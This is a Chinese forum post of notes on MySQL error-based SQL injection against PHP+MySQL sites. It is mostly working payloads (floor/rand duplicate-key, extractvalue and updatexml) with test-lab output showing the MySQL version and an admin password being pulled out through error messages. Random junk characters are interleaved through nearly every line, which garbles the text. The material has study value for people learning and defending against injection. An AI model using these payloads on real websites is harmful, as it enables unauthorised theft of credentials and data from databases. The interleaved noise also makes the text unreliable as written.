放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
: L. i( {/ z9 q8 x% p; x6 C0 H5 l实际测试环境:
- F# e9 _+ W$ W+ J7 E, w. ?0 _$ ^# i0 t" w' f$ v
0 k4 }% ]' }$ ?mysql> show tables;
! b6 {; S, T. X p5 }+ Q. V+----------------+
) p; {5 C9 N3 i9 D U, s4 O| Tables_in_test |
# x5 L, M1 |' P# s+----------------+
/ x) p3 G* d0 x! \2 O' }) m| admin |
6 q# v& k8 _" L- z; X/ o| article |
8 }% i( u+ ?* {# A5 e I+----------------+9 G; ?, n" v) x. [% U3 O+ e
]2 N7 I) Z' D- a* H4 }
* L M! z Z( ?8 U
6 S7 ]9 q B0 ~! Y9 dmysql> describe admin;4 f) k+ I- r1 }) x1 W4 C
+-------+------------------+------+-----+---------+----------------+
+ P# G1 c) `( Y1 K4 v3 o7 t| Field | Type | Null | Key | Default | Extra | P) |9 h3 c0 X0 j$ m- L. K: P
+-------+------------------+------+-----+---------+----------------+
: N& X/ e& x( }| id | int(10) unsigned | NO | PRI | NULL | auto_increment |8 K/ ~4 Z( y9 \6 `
| user | varchar(50) | NO | | NULL | |0 E( t( t/ E0 q* w) Q0 m8 Z1 ^
| pass | varchar(50) | NO | | NULL | |
- p# g9 C6 M4 b# }8 }$ V+-------+------------------+------+-----+---------+----------------+! ^" P1 ^ e& _8 m
; n( g0 N A8 b( |
6 i1 I# V: e1 J' T1 u
: n, E4 d- U/ g0 r, G) } B
mysql> describe article;
( R7 ?' I+ v- {: t: Z8 T+---------+------------------+------+-----+---------+----------------+
/ e" g% _" d7 n. o3 [+ }| Field | Type | Null | Key | Default | Extra |! B. l9 N1 P$ T: d% |: Q
+---------+------------------+------+-----+---------+----------------+
1 V* W# z' S! l# l# y| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
8 D3 l2 c. K% ~9 w| title | varchar(50) | NO | | NULL | |& l7 x; T3 }& A w! Z4 ]6 W5 s& H
| content | varchar(50) | NO | | NULL | |
) a, A s( G- l1 ^+---------+------------------+------+-----+---------+----------------+
0 l% g6 T) o/ E) u: W5 R1、通过floor报错, V) y0 V* E0 P; S
可以通过如下一些利用代码
5 x. Z: c9 ^/ ?2 V* ]) Y" c5 S
% B/ B& E$ {4 P5 y2 F1 I S" b, O) q$ i3 i7 a
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x" ^) I: ^: H9 a8 U# d, ?3 a
from information_schema.tables group by x)a); b% i4 i- ]- U0 C: L7 {! J8 ~& k
# B! i" H' U- F" a6 d 7 g" x9 t8 o6 y
and (select count(*) from (select 1 union select null union select !1)x1 I( F$ c3 ?# u- o* d! \6 A
group by concat((select table_name from information_schema.tables limit 1),
' x: B3 o6 z" w3 O5 X" E. \9 kfloor(rand(0)*2)));5 ^( y$ C1 J5 y
举例如下:
+ W" m2 Y1 g0 ]/ L/ G; `2 t$ H. j首先进行正常查询:
7 m& f4 m! D: ?) }$ \! o 7 L5 J, s3 T. Y0 D+ z* Q
mysql> select * from article where id = 1;
" }8 N6 p% \, ? {+----+-------+---------+
+ }' L, }$ Q0 w$ Z5 u1 m| id | title | content |
g* M( k9 n: ]1 V0 o: W/ {% M+----+-------+---------+
* F/ O5 I& H) V| 1 | test | do it |
, U- S8 b8 p$ Y8 e3 {8 n) g. q+----+-------+---------+) N/ ?% b N; d+ v9 i
假如id输入存在注入的话,可以通过如下语句进行报错。
; J' u. x3 [' i8 [/ w % T" W5 [/ _3 X/ d2 E
9 k3 m/ B! L0 V
mysql> select * from article where id = 1 and (select 1 from E3 ]* ^* ?( {4 }4 L, [0 k
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
/ ~. d/ a/ y+ I- Q( Z- NERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
% j5 d! z/ n+ Q可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。8 {2 ~% N4 N) l8 @: x- i
例如我们需要查询管理员用户名和密码:
( I$ n' I$ K4 P! J9 V; m6 a, TMethod1:
3 z+ j' {! y2 ~# G9 W 3 Z# ?. |1 F: I$ @- M9 {% x2 Y4 x
8 M$ J! Y0 K* i7 g/ Imysql> select * from article where id = 1 and (select 1 from
8 @8 j) g- B" H4 D3 k; L5 v(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x7 W% _( r6 B* d/ ?2 a% }
from information_schema.tables group by x)a);
# H+ [+ o5 z8 ?; G2 N4 DERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'! d6 g4 N, Y7 w+ F( a/ V8 ?, Q
Method2:- F% Z6 \: u: b& ~% D, w6 B
2 W9 V9 x6 X+ j8 @5 R
$ ^7 I: I' _5 D. k" H
mysql> select * from article where id = 1 and (select count(*)4 ^2 P1 D8 V: W3 Z6 h
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),3 f% c9 Z! {+ ? y( o
floor(rand(0)*2)));
2 Z6 Q) @- l1 {5 z. ?' LERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
( R4 L) w' M1 e3 ?% e2、ExtractValue
4 F# l$ [( y1 x2 g/ V0 [测试语句如下
! Z" [ f7 T' a; t6 [
8 O- c$ }3 j5 X9 w& C% F* O$ D 7 P3 g% n$ p3 i+ _
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));# o; W" j) d/ }* P ~
实际测试过程
H" p' S- [! [& e8 g+ t 8 I! o" V& C" n3 N |0 _8 B# C
& p1 K: @7 t& i b9 h
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
/ L- y& n* I; h5 D0 t(select pass from admin limit 1)));--' P0 g9 o0 i: }+ N, m+ U4 q# O7 O: e
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
, }2 t) c8 l; q4 t: p3、UpdateXml* N* T/ Q, v4 U: D2 v6 w$ t' p& C
测试语句
/ y4 g8 R1 a# i# K) v; {) u3 x
, H; S7 G9 E, x8 B( @- M
. m* Q* M9 h3 b8 V" p2 Yand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
4 j M: ]) Q+ J实际测试过程
/ y3 Y6 D$ m& Z9 x- I$ B
# e+ L8 h+ W2 S% g 4 @& A. K( X6 u) O+ Y
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
5 @' ?- B9 t7 N! Q(select pass from admin limit 1),0x5e24),1));1 q: w) N4 R; C- U; H7 Z
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'4 k0 Y# V+ u/ T8 m/ U- Z5 c
All, thanks foreign guys.
6 w+ Y3 |* t: j& b
, U* \2 ^* |! s) ], i5 ?- A6 _8 u, D3 D. h& F6 i
|
发表于 2012-12-10 10:28:51
收藏
支持
反对